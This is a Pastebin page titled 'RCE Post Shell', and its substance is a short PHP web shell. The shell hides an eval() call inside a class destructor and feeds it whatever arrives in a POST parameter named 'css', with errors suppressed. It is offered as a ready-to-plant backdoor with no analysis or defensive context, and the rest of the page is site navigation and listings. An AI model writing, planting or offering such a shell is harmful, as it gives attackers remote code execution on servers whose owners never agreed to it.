Pastebin
API
tools
faq
paste
Login
Sign up
SHARE
TWEET
RCE Post Shell
willysec_id
Jan 4th, 2024
1,274
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!
PHP
0.18 KB
| Cybersecurity
|
0
0
raw
download
clone
embed
print
report
<?php
class
Test
{
public
$name
=
''
;
function
__destruct
(
)
{
@
eval
(
"
$this->name
"
)
;
}
}
$test
=
new
Test
(
)
;
$c
=
@
$_POST
[
'css'
]
;
$test
->
name
=
$c
;
?>
egm
Advertisement
Add Comment
Please,
Sign In
to add comment
Public Pastes
setups
3 hours ago | 0.16 KB
Untitled
3 hours ago | 0.36 KB
my-push Script
3 hours ago | 0.61 KB
cholibrium
1 day ago | 1.65 KB
SMB BIS - Dimble Woods - Virtual Piano
1 day ago | 3.15 KB
buscar-productos.blade.php
PHP | 2 days ago | 2.44 KB
simple youtube video to product
PHP | 2 days ago | 3.71 KB
OoT rando seed 6/1
2 days ago | 68.21 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!